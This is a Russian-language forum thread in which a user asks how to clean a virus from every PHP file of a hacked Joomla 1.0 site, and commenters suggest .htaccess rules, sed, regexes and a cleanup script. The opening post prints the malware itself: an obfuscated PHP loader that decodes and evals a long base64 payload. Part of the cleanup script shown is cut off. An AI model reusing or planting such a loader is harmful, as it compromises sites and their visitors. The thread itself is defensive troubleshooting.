GD Star Rating
loading...
loading...
Народ, который работает с Joomla, помогите, пожалуйста.
На сайте завелся вирус. Пример его – внутри поста. Вопрос такой – можно ли его вычистить как-то автоматом, млм нужно сидеть и чистить каждый файл. И где чистить – только вначале файла, или есть ещё места, где он может быть?
<?php
$md5 = “bdb5bd5befa0099d1d4cf540a1acf975”;
$ad = array(‘4′,”g”,”o”,”a”,”r”,’t’,’d’,’b’,’c ‘,”n”,’v’,’i’,”_”,’;’,’z’,”$”,’s’,’f’,”e “,”l”,”6″,'(‘,’)’);
$bd5 = create_function(‘$’.’v’,$ad[18].$ad[10]. $ad[3].$ad[19].$ad[21].$ad[1].$ad[14].$a d[11].$ad[9].$ad[17].$ad[19].$ad[3].$ad[ 5].$ad[18].$ad[21].$ad[7].$ad[3].$ad[16].$ad[18].$ad[20].$ad[0].$ad[12].$ad[6].$ ad[18].$ad[8].$ad[2].$ad[6].$ad[18].$ad[ 21].$ad[15].$ad[10].$ad[22].$ad[22].$ad[ 22].$ad[13]);
$bd5(‘DZRHDqRYAgWP09ViASReo1lgE5d4+MBmhP fec/qpG8ST4kVxJv2f6m3Gsk/24k+abAWJ/y8vsi kv/vwj5I4sLDdgO8Eh8gqwpKBs7VXFWNtV3aArR5 YFDAOzWI7kyvZSJXRgQ7RBmH3CJ9kDRG5g+tDT36 KfMO1mfeZIyN6btCz9nDJ3WBy7EdDo6YsRyGe1s/ EtVTe4HzfcDO3r2yl3YS0tdQvHOBFZZZh4Xy0WhR 4W9C6Yf+Z4SbXikwiOXb0UMbuKVo66iRZ9ZA3FRO NacH5vvSRsBgD+8GLQHCdV0yQyu2fxhSAGTwtDJy V/izqqL5qo0NyegowD4b8JZCPLEyrSkx2S8NiqrH dmRNhEqUsxqG7J+81Jr6tg0ReX4g6rt1CkOwvh7u OanZxWeHCEpYYxwkz/d2csEQJ1vtCj2lpgI67HJU ooauhbRDC3PIX4yYg4jyhq78uGXoLizuhRo1SLqk QzKMIyxGhAB1jpq2h3NYg1VeF0a4qHJrL51SQ576 M+Ra/ILlw2FuSt0IV0kHuVcHIf6c0i4npTYiLSnt KMjBTwAvtH2J/OiEkJh/utn7xrXJeXy4NfGHwOlc USGilCRo0x5+f0mrP9VLbPxicb/YEyZ9Z49A+FZ5 5ybIXL4fjsoOBm9hsW421CAffZHYyENoo5S5pBO7 uLcTmz33J5ryIQitCIwnPc0yQuueZg3o6A2Q65fB B0O1WXd1JltbJsZIu0SS2OzgcdwFec99a5iMohyk c5xVYuiFIeisPUTMbjbGM3sALkuePkR5mmilj6iw R3o4LDMODEifQptfbTkU3PCrW49dOX7tAQSXVy1l 08WsMz0rhgTtApTB2t0llp1Msf4jpItisr9xlLz3 xnEYbFUa3SNjXR+yS7qjFhgtlUuyXki4qqK7rTxJ 3w46Lg1LASptEsQ/DaWTMh3uqxmvIjZdsIAj0T/S bFs02zQ18IHopChOQlqkPZFzzqfcvbvh7k2i1V6q JuUNOUL2MWmarwk+mrMuluJ83RsJut/uIi7P/sXr FAa3NNt0cK5de/GG0Zg7dElab0sgJjJ4JUb6l28H TWEOWcuV7FXfl3x9f1iEa+PDkURx8aPiFUOjjtUk lsxYslcjLpdV8Uagq0s94q5vtV3yS2w7uAedL6GY MuEZXpC154bphu9O2d14qP8Z3SqwXCQ0O2vWS/eZ zGU31y2LP1oNi/aU19YRG3yw6TzbytOeZSPUXk0V zFN3RAZcUP5dhdlMYiniq37fCbDzd9RgKMFAE2+5 tV9hpbrXhpg91tQ8bAIMriuhVjRKoU0yj4Yl9XwB Yjkzf6/O2pCVgBbWi3nBgULJmgJ/Q5cWdHWPX41Z Lfkc7To6Y8tuelDWkEbWf8FXB/OTEjw+rzonOliO dcE0kGRXTZe52fZTdygKvx1Gx/k5E/xLzVBLSBzV D2Fq7UYIDeE2he+wzZqWl763+B1WE3RPSkj8n2Xm vUL8yVQGFgx92LCyzz94ObLzbbdZ5wwCD7ybRLdC eHXp3jfpNvGnd8C4gwY0uitrYrx++tmMvtTjhZqV zJuso2WwoslM9yOtMI3OyurItCmhVS9jk8Toc1x0 MU2Bu42LC2fnlmym/gSIIVhS5c08Fazd/DYxAtg0 8FasQpuNdMbQxzAxIABBL5jttAdqQTF/edbrXIXs Wtc5ftJipQyTVHKnjCiBxF4YO7h2GRiMNEnlrYq+ u22CXSQLOwHLtJIMhUsi8VxMe7zLmfTyus06zP6B dhgbHVq7utpy+uskNNyUBcEjX+8uNZRhGct9Ps/A iBWIa3ERQUWJqiQZWH9hcEER80QPT+bm7QeZeZAG yQT/6jRhb2ET8Y3hZ8/LWp5lYPLOoeU/iCv+uhbD zbot5CeqwOyDsmtYqWiUji7IOifHuqJzJ0T3U6fe Dc0A28WXybK/jBUZHwiAWopDrO63PSOLHn6Uqk95 F9Je7loSRPAWIFZNGRd7cU5IWGO/Zqf31QFLnamW khdiefe2/fNFG8Tqd2zh4SsrmZfgJqyRbrv/N8+L aV/IjX3AIaNr/T37Oc5iecgny9xxXih13g3SweKS iyg/E5Z7x88ElkB0LHe7m04ueTT5YwnRmowWu32/ 03sh7kScKJowmsmhkWATahBX7H9hgJaWBqejfVqy ZGUVJHasPA53muGAxBRVnC1++///z777//+T8=’) ;? >
<?
////////////////////////////////////////
// ‘‡?? ?? ?‡???‡ ‰?????·???‚‡:
// CMS “Joomla 1.0.8.2 RUS Paranoia MCE”
// —·???‡ “March Cat Edition”
// ?‡?‡ ‚?????‡: 13.03.2006
// –????‡? ‚????? ?? AndyR
// ???‡???‡??? ? ?·???‡ ‰?????·???‚‡:
//
// mailto:[email protected]
//////////////////////////////////////?>
Ой, кодировка не та. Но не важно. Подобное – в начале каждого файла. И, хостеры говорят, порывается что-то куда-то рассылать сайт.
Для начала нужно найти файлы, которых нет в твоей локальной копии. Во вторых не стоит пользоваться компонентами которым уже много лет и они не обновляются.
это не мой сайт. У меня нет локальной копии. Удалить полностью какие-то компоненты я не могу.
sed тебя спасет
сузить круг иногда можно по дате изменения файла
можно чуть подробнее? Чтобы я спросил у Гугля, где почитать про sed, я должен понять, что такое sed
Я подобное чистил локально, с помощью Notepad++, но это помогает только в тех случаях, когда вредоносный код везде одинаковый
подобная срань обычно прописывается во все php-файлы одновременно, поэтому дата мало что скажет
ssh доступ есть?
И что у тебя в файле /home/uahorse/data/www/virainfo.uahorses.com/mambots/editors/tinymce/jscripts/ti ny_mce/plugins/autosave/langs/65f.php?
не только tinymce, jce тоже дырявый.
Автор, прежде всего ищи странные картинки. Просмотри и js файлы.
Общаая рекомендация (и самая действенная) – запретить выполняться картинкам. С помощью апача, например.
в папках с картинками кладем.htaccess файлик:
php_flag engine off
RemoveHandler.phtml.php.php3.php4.php5.p hp6.phps.cgi.exe.pl.asp.aspx.shtml.shtm. fcgi.fpl.jsp.htm.html.wml
AddType application/x-httpd-php-source.phtml.php.php3.php4.php5.php6.php s.cgi.exe.pl.asp.aspx.shtml.shtm.fcgi.fp l.jsp.htm.html.wml
Это файл инклюдит код из первого сообщения, вот я про него и спросил
ох
Антон, нахуячь ему скрипт уже.
ох.
Он еще не ответил про доступ по ssh.
вместо того чтобы охать, как старая бабка, объяснил бы. Будь конструктивней и не кокетничай.
Я вот ни разу не юниксоид, но когда взломали 18 сайтов у хостера, этими методами добился безопасности.
в общем случае хакером из гугля ищется компонента, которая может аплоадить картинки. А таких до хера. Потом эта ‘картинка’ выполняется.
Можно узнать, как ты узнал, что «добился безопасности»?
Сдается мне, что ты не безопасник.
начнем с того, что он нигде не писал, что у него апач.
и делать выводы, что этот метод подействует – несколько странно.
Что касается выполнением картинок с помощью модуля похапэ – это я не знаю, каким мудаком надо быть, чтобы так настроить.
Метод один – скриптом вычистить говно из файлов и запретить их модификацию.
Хотя я не знаю, как там жумла устроена, может ей надо через веб-интерфейс содержимое модулей менять, но это вряд ли.
Тем, что есть несколько коммерческих сайтов, которых целенаправленно добиваются. Ради интереса, могу убрать.htaccess файлы – сайты будут взломаны через несколько часов – проверял.
А что, есть что-то дельное сказать?
доступ только по FTP и Control Panel хостера
это хорошо, что ты с этим всем не сталкивался 🙂 Хотя охаешь.
Скриптом через ssh не всегда получится.
Запрет модификации – это единственная полезная информация в твоем теоретическом мессадже.
куда нам, хули.
Скриптом через ssh не всегда получится.
это почему?
Ты прикрыл одну дыру, а не обеспечил безопасность. Прикрыл, надо сказать, странно. У тебя же nginx перед апчачем (если нет, то разговаривать дальше не о чем), так зачем отдавать картинки апачем?
не то, что бы я придираюсь, но для начала читаем требования joomla к хостингу, а потом пишем типа – начнем с того, что ты пиздоглазое мудило 🙂
Что касается выполнением картинок с помощью модуля похапэ
Это сейчас ты обосрал походя миллионное сообщество joomla (да и не только joomla).
Тох, да там говнохостинг скорее всего, без возможности поставить свое приложение.
зато десять долларов в месяц всего!
а потому что он может быть разный, как у меня. И не надо у него просить доступ по ssh, это совершенно необязательно, можно просто подсунуть ему некий replace.php и выполнить.
а спорим на штуку евро, что я смогу запустить joomla без использования апача?
выполнить пхп, чтобы очистить пхп, и запретить изменения пхп.
это за гранью, я покидаю пост.
эй-эй, тебя чего-то не туда несет 🙂 человек помощи попросил, а ты обосрал всё что можно, устраиваешь тут развод на штуку евро и покидаешь пост.
Безопасность и говнохостер это как бы взаимоисключающие параграфы.
на, забери с собой
0) {
global $i;
++$i;
echo ““.$i.$filename.”:
“.htmlspecialchars($buff[0], ENT_QUOTES).”
“;
if($GLOBALS[‘del’]){
$code = $buff[0];
$file_buff = str_replace($code, ”, $text);
echo “ept rabotaet”;
$file=fopen($filename,”w”);
if (fwrite($file,$file_buff))
{
echo ‘исцелен!!’;
}
else {
echo ‘Ошибка!’;
}
fclose($file);
}
$GLOBALS[‘num_infected’]++;
}else
{
}
echo “
“;
};
dir_walk(‘del_virus’, $dir, array(‘js’), true, $dir );
echo “Всего заражено = $num_infected
“;?>
ody>
сука парсер
Ребят, а кромме того, чтобы на будущее прикрыть исполнение “картинок”, сейчас сделать что-то можно, чтобы автоматизированно почистить скрипты?
тут в посте речь идет о joomla. БЕСПЛАТНЫЙ движок для сайта.
больше всего в таких говнохостерах удручает то, что взломав один сайт, хакер начинает шуровать по всем остальным в каталоге. Как этого избежать?
Сменить хостера, либо научить/заставить админов хостинга работать. Первый вариант более реалистичен.
неизвестно, как тебе будет лучше, смотри сам:
…
который исполняется бесплатным php на бесплатном линуксе. УЖАС!
нечто вроде отдельных аккаунтов внутри ресселинга..
Если файлов не сильно много – скачиваешь себе все, чистишь подручными средствами, заливаешь обратно. Если много – придется писать php скрипт, который проходится по директориям и ищет base64 в файлах.
тебе предстоит большая работа 🙂 Я проходил через это. И надо обновить движок, эта Паранойя семилетней давности. И, помнится, со скрытыми линками на давно дохлые сайты.
много, в joomla до хренища файлов, порядка 2000, без дополнительных модулей и компонент.
если быть точным – Файлов: 4 882; папок: 1 138 (Joomla 2.5.9)
не надо мне рассказывать про джомлу, 2000 файлов за часок должны стянуться.
это текстовый редактор потоковый
а в связке с awk можно вообще стихи писать при желании 🙂
/ /
если коротко, то предложили залезть по ssh и прогнать регулярку по всем файлам.
там Joomla 1.0
человек к вам починить жигули принес, не забывайте. Зачем вы ему шасси от мерседеса подсовываете?
можно просто в ssh
find / -name “*.js” -type f -print0 | xargs -0 sed -i ‘s/try{q=document.createElement.*}/#cle aned/g’
ну по логике источник должен быть самым первым из недавно модифицированных
Самый простой способ – удалить сайт по ftp. Вирус не удалится, останется (в большинстве случаев).
по SSH доступа нет, я выше написал. Похоже, придется чистить вручную. Но там дофига файлов и, главное, нет гарантии, что я сам всё нормально вычищу.
слей себе, прогони седом, залей обратно
пришли в пост архив, сделаю за пиво
Во Франция “Оболонь” буду слать? 😉
разберемся
Мой мозг в данный момент не в состоянии осилить регулярку, прошу помощи!
Нужно найти следующее:
чтоугоднонасколькоугоднострок$ad = arrayчтоугоднонасколькоугоднострок?>
парсер лох
включи PCRE_DOTALL, либо сделай через класс отрицания
Чуваки, помогите с регуляркой для notepad++
Как найти такую ебалду?
в 6.3 отметь галкой ‘. matches newline’ и попробуй вот . Там может еще первый квантификатор ковырять надо, хз.
заебок, нашло. Поставил заменять.
ты бэкап-то хоть сделал на всякий?
да, мне Егорыч архивом скинул же
писать в блоге кот – дело неблагодарное
“ну хоть что-то у нас в безопасности”
я как-то вычищал ворпдресс, там достаточно четко было видно, где вирус прописался, а где старые нетронутые файлы. другой вопрос, что пока юзвери не сменил пароль с 123456 на что-то нормальное, он возвращался… git init + git status решили вопрос дальнейших наблюдений
Обычно я пишу файловый сканер с регуляркой. Цена вопроса 15 минут.
Один раз лечил такое одному мудаку (у него пароль был 11111, не было бекапов и не заплатил по договору). В итоге пхп-вставки регуляркой вычистил, но там оказалось спрятано ещё 3 шелл-закладки.
Мораль: лучше снести всё и сделать с нуля, и делать бекапы ещё )))
?‡?‡ ‚?????‡: 13.03.2006
настоящая проблема не в вирусах, а в уязвимостях семь лет не обновлявшегося движка
я потом ещё закладку нашел. Была в templates от предыдущего работника.
кстати, да
git/hg – отличное лечение от таких случаев